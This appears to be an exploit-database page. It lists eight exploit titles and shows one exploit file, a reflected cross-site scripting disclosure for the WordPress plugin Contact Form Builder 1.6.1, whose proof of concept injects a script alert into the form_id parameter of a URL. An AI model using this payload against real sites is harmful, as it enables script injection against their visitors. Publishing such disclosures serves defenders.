
8 changes to exploits/shellcodes Cain & Abel 4.9.56 - Unquoted Service Path Hospital Management Startup 1.0 - 'Multiple' SQLi Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated) Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated) Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS) WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
13 lines
No EOL
551 B
Text
13 lines
No EOL
551 B
Text
# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
|
|
# Date: 2022-02-07
|
|
# Author: Milad karimi
|
|
# Software Link: https://wordpress.org/plugins/contact-forms-builder/
|
|
# Version: 1.6.1
|
|
# Tested on: Windows 11
|
|
# CVE: N/A
|
|
|
|
1. Description:
|
|
This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
|
|
|
|
2. Proof of Concept:
|
|
http://localhost/code_generator.php?form_id=<script>alert('xss')</script> |